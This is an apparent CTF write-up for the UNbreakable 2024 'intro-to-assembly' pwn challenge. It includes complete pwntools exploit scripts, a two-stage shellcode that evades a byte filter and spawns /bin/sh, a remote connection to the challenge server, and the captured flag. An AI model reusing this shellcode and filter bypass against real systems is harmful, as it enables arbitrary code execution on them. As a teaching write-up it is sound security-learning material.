Intro to Assembly

04/03/2024

AmonRa 14

The Challenge

This challenge was apart of the UNbreakable 2024 CTF in the individual category.

Name: Intro-to-assembly Category: Pwn Difficulty: Easy Solves: 24 Description: I want the shell, but they want me to work for it :(

Discovery

The first thing we see when we lay eyes upon this challenge is that we have access to an address where we can connect remotely and that we are given the binary file intro-to-assembly.

If we open this file in IDA and go to the main function, this is what we get:

After analyzing it, we can confidently say that the function works as follows:

Uses the mmap() function to allocate 24 bytes of memory, with permissions set to read, write, and execute.
Uses the read() function to read 24 bytes from standard input into the buffer.
Initializes the ‘dest’ variable with zeros and then copies the input from ‘buf’ into ‘dest’ based on the length of the input.
Starts looping through each byte of the input.
Checks to see if the current byte is 0x31(‘1’), 0x0F or 0x05.
If found, it will print an error message and exit the program.
Otherwise, it will execute the buffer as code.

In addition to the functionality described above, we can also address the _readfsqword(0x28u) which is used at the beginning and at the end. This represents the stack canary, a buffer overflow protection, which can also be confirmed by running the command checksec --file=intro-to-assembly :

Exploitation & Debugging

While the discovery phase was fairly straightforward, we now need to find a way to exploit the file. We know that we cannot do a buffer overflow and we know that we can input up to 24 bytes of code into the buffer. The first idea we could try is to see if we can input a syscall, but remember that we also have a check for specific bytes. If we use an online assembler we can see that ‘syscall’ has the raw hex bytes ‘0F05’, exactly the sequence that we are prevented from using.

The next idea we could try, is to first input a payload that would call the read function again. This might work because if we do this, the second time we input something, our input wouldn’t pass through the byte-check and we can write whatever we want. Let’s try it with the following input:

mov    rsi,rdx     
push   rax         
pop    rdi
mov    rdx,0x100
push   0x401110
pop    rax
call   rax

To explain how this works, we first specify that we store our input into rsi. Then we need a ‘0’ in rdi in order to read from standard input. In our case, rax contained 0, so I moved the value of rax to rdi. Then we set rdx to ‘0x100’ to specify how many bytes to read. After that, we can store the address of the PLT entry of the read function in rax and then call it.

We can verify that code using an online assembler and we see this:

So our input contains 20 bytes, so it fits into the 24 bytes we have allocated, and it also does not contain any of the restricted bytes. At the moment our code looks like this:

  
from pwn import *

context.terminal = ['tmux','splitw','-h']

p = process("intro-to-assembly")

shellcode = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # 20bytes len

gdb.attach(p)

p.send(shellcode)

p.interactive()

Let’s jump into gdb and see if we get the desired result. First we’ll type finish so that we skip over the initialization code and get to the main function. Then, we’ll type disass main to disassemble the main function. At this point we see this:

So we’re going to copy the address of call rdx, and set a breakpoint at that address. Then we’ll type continue to go to it. We are interested in this address because that’s where our input gets stored before it gets executed, which is confirmed by this snippet we can see in IDA:

After we get to the call rax instruction, we can use si to step to the next instruction.

Doing this, we see that the next instructions are precisely our code. Awesome! Now, if we continue to step through the following instructions, at some point we won’t be able to anymore, as seen below:

At this stage the program is actually waiting for our input. Now if we jump over to the left side of our terminal and input something, we can see on the right side that our program automatically jumps to the next instruction.

If you look on the right side at the rsi register you can see that it points to our input, just like we told it to in our code. So it works as expected. So far so good, all we need to do now is to insert a payload in the second input that will give us shell access. We can use this one:

"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

The disassembled version looks like this:

0:  31 c0                   xor    eax,eax
2:  48 bb d1 9d 96 91 d0    movabs rbx,0xff978cd091969dd1
9:  8c 97 ff
c:  48 f7 db                neg    rbx
f:  53                      push   rbx
10: 54                      push   rsp
11: 5f                      pop    rdi
12: 99                      cdq
13: 52                      push   rdx
14: 57                      push   rdi
15: 54                      push   rsp
16: 5e                      pop    rsi
17: b0 3b                   mov    al,0x3b
19: 0f 05                   syscall

You can find this on the Internet and it requires no adjustments in order to work. However, I’m going to explain how it works, just because it’s interesting to see. First of all, let’s understand our purpose. We’re planning to use the execve() syscall in order to gain access to the shell. What the syscall does is it starts a new process in place of the one currently running. If you look at the manual page I’ve added to the resources section, you’ll see that the structure of the execve() syscall looks like this:

int execve(const char *pathname, char *const _Nullable argv[],
                  char *const _Nullable envp[]);

As you can see, it takes 3 arguments: the pathname of the program to execute, an array of string arguments (argv) and an array of strings (envp) representing the environment variables for the new program. For the first argument, the path we’re gonna need to specify is bin/sh, which will open a new shell instance. The second argument is an array in which you need to first specify the name of the executed program and then any other command-line arguments you want to pass to it. Since we don’t want shell to start in a modified state, we need only the name. So our second argument should look like this: ["/bin/sh", NULL], with a NULL pointer at the end to specify the end of the array. The final argument will also be NULL since we don’t require environment variables in this case. All together, our final syscall should look like this: execve("/bin/sh", ["/bin/sh", NULL], NULL). Let’s see how this payload accomplishes that.

xor eax, eax

this is an efficient way of setting the eax register to 0 by xoring the value with itself. Which often uses less bytes than moving an immediate value into the register. eax will later be used to specify the syscall number.

movabs rbx,0xff978cd091969dd1
neg    rbx
push   rbx

these two work together in an interesting way. The first instruction moves the immediate value of 0xff978cd091969dd1 into rbx. Then the second instruction negates that value. The result of that negation is 0x0068732f6e69622e. Doesn’t seem interesting yet? Let’s convert the resulting value to its ASCII representation. We get ‘0x00hs/nib.’. Now, considering this is in little-endian format, if we convert it to big-endian we get 'bin/sh0x00', which is essential in order to gain shell access. The reason this payload goes through the process of negating it is because if you were to pass the 0x0068732f6e69622e value from the start, depending on how the code is interpreted, it might get terminated when it encounters the NULL byte(0x00). This way, we use 0xff978cd091969dd1 instead, therefore we avoid that. The third instruction just pushes the resulting value on the stack.

push rsp
pop  rdi

pushes the value of rsp(stack pointer) onto the stack. This is done to get the address of the string /bin/sh on the stack. Then it pops that value into rdi, setting it up as the first argument to the execve syscall, which expects a pointer to the command to execute.

cdq

this just represents a way to set rdx to 0, which will represent setting the third argument of the execve() function to NULL. In short, since we previously set eax to 0, the cdq instruction will copy the sign of eax into edx, making it 0, and since edx represents the lower 32 bits of rdx, rdx will also be 0.

push   rdx
push   rdi
push   rsp
pop    rsi

These instructions manipulate the stack to set up the second argument to execve, the array of arguments to the program. By pushing rdx (which is zero) and then rdi (address of /bin/sh), followed by rsp, the code effectively constructs an argv array with a single element (the address of /bin/sh) that is terminated by a NULL pointer. After that, it pops the top value off the stack into rsi, setting it up as the second argument to the execve syscall. This represents the argv array for /bin/sh. Below I attached a visualization of the stack.

+------------------+ <- Higher Memory Address
| Address of "/bin/sh" |
+------------------+
| NULL             |
+------------------+
| Address of argv[0] | <- rsp points here
+------------------+ <- Lower Memory Address```

mov    al,0x3b

Moves 0x3b into the lower 8 bits of the eax register, preparing for the syscall invocation. 0x3b is 59 in decimal, which is the syscall number of execve()

syscall

Executes the syscall instruction, with all the args we’ve set up so far. So in the end, execve("/bin/sh", ["/bin/sh", NULL], NULL) will be called, which will start a new instance of the shell, giving us access to execute arbitrary commands on the server.

  
from pwn import *

context.terminal = ['tmux','splitw','-h']

p = process("intro-to-assembly")

shellcode_first_input = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # 20bytes len

gdb.attach(p)

shellcode_second_input = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" # 27bytes len

payload = 'A' * 0x15 + shellcode_second_input

p.send(shellcode_first_input.ljust(0x18, b"\x90"))
p.sendline(payload)

p.interactive()

One part that was necessary to add to the code was the .ljust(0x18,b"\x90"). What this does is it adds some padding at the end of our first payload, specifically adding the byte \x90, representing the NOP, or “NO-OPERATION”. This operation essentially does nothing. Which is very helpful to us. Why do we need it? Well, in the first debugging process we did, we didn’t need it, because we were only sending one payload. But now we’re sending two, which changes things.

You probably noticed we are sending the first payload with send(), instead of sendline(). That is because if we were to use sendline(), the function would’ve added a \n at the end, which would be interpreted as shellcode and mess up our payload. As a consequence of not being able to add a ‘new line’, we also don’t have a separator between the first payload and the second one. Due to the fact that both of the payloads are sent really fast one after another, either to our program, locally or to the server, remotely, the program won’t be able to figure out where the first payload ends and where the second one begins, and so, when it reads and executes the first one, it might also take a chunk out of the second one(which it did, causing a segmentation fault). Since our payload is 20 bytes and the read() function reads 24 bytes, we just fill the rest of the input with NOP, which results in creating a clearer segmentation between the inputs and fixes the problem.

This is only one way of fixing this. Another way would be to add input("????") between sending the first payload and the second one. That way when our first payload which calls the read function gets executed and reads input again, instead of automatically reading the second payload, it will just pause, and wait for you to press enter, and only then will the second input be sent. This also solves the problem.

Another thing I added is the “AAA” padding, right before the second payload. This padding acts as a buffer zone, filling the memory space before the actual payload. If we remove it, you can see that after the read function, rsi points exactly at the beginning of our payload, and in the instructions, you can see that after the “ret”, our payload starts from push rdi, which is the 9th instruction of our payload. That’s definitely not good.

Now, if we keep the padding, rsi will start pointing at our AAA (represented as 414141) which does nothing, paving the way up to where our instructions that need to be executed are placed. And as you can see below, after the ret our payload actually starts at the beginning, as designed.

If we run the debugging process we did above again, this time, instead of getting to a point where the program waits for input, we can keep stepping through instructions until the last syscall where we see this:

As you can see, our payload worked. And so did our strategy. Even tho this payload contains the 0x0F 0x05 sequence, it didn’t pass through the byte-check and it got executed without problems. Now before we move to the final step and get that flag, I just wanna point out a neat little detail. We’ve already seen how we bypassed the “illegal” byte check, but you might be wondering: how does our second payload work, considering it has a length of 27bytes and we write in the same memory area where mmap() mapped 24 bytes? Aren’t we going over the limit?

This scenario showcases a fundamental concept in computer architecture, specifically within memory management. The mmap function handles memory mapping by aligning it to the boundaries of a memory page. If you look in the resources posted at the end of this write-up, you’ll see I linked the source code of how mmap() works. At the 1208th line, if we start reading we’ll see this part:

	len = PAGE_ALIGN(len);
	if (!len)
		return -ENOMEM;

This code rounds the length up to the nearest page size, which on most systems is typically 4KB, ensuring that even a request for 24 bytes results in the mapping of a full memory page. This page-aligned allocation strategy is crucial for the kernel as without such alignment, systems could face issues like memory fragmentation, where usable memory is wasted in small blocks, or security vulnerabilities due to inconsistent handling of memory access rights across differently sized blocks.

Ok, now that we’ve also shown a bit about how memory management works, all we have to do now is comment out the local process and the gdb.attach in our code, and connect remotely like this:

  
from pwn import *

context.terminal = ['tmux','splitw','-h']

#p = process("intro-to-assembly")
p = remote("34.89.210.219",30895)

shellcode_first_input = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # First shellcode modified. Used push rax instead of r12

#gdb.attach(p)

shellcode_second_input = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" # 27bytes len

payload = 'A' * 0x15 + shellcode_second_input

p.send(shellcode_first_input.ljust(0x18, b"\x90"))
p.sendline(payload)

p.interactive()

Running the file, we have shell access to the server and there’s our flag: CTF{926e420eeeeb6ac4890ddd46af5462d922e01307ef77d97d6799b167ed17e44f}

Conclusion

Whilst this challenge was labeled as easy, being a pwn noob myself, I found it needed me to be pretty engaged in order to grasp all the concepts. Which is precisely the reason why I wrote this in a detailed step-by-step manner. I hope this write-up has been of use and you learned as much as I did from this challenge.

Resources

Online assembler/disassembler: https://defuse.ca/online-x86-assembler.htm#disassembly2

Functions manual pages: https://man7.org/linux/man-pages/man2/mmap.2.html

https://man7.org/linux/man-pages/man2/read.2.html

https://man7.org/linux/man-pages/man2/execve.2.html

Mmap() source code: https://codebrowser.dev/linux/linux/include/linux/mm.h.html#221

Pwn